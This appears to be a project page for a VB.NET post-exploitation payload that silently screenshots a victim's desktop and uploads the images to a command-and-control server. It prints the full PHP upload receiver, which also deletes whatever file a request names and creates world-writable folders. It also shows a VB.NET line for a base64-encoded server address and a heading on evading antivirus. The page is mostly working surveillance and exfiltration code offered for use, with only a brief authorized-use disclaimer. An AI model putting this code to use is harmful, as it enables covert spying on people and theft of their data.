Mr.Peter
1.0.0
Silent Screenshot Capture | Post Exploitation Payload | VB.NET
A simple payload to take the screenshot of victims desktop and upload it to the C&C.
<?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
$file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>
Dim server As String = BaseDecode1("your server address here in base64 encoded")
Dim php As String = "yourphpfilename.php?" & "folder="
To Avoid Antivirus Detection
If this tool has been useful for you, feel free to thank me by buying me a coffee :)
This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.
GNU GENERAL PUBLIC LICENSE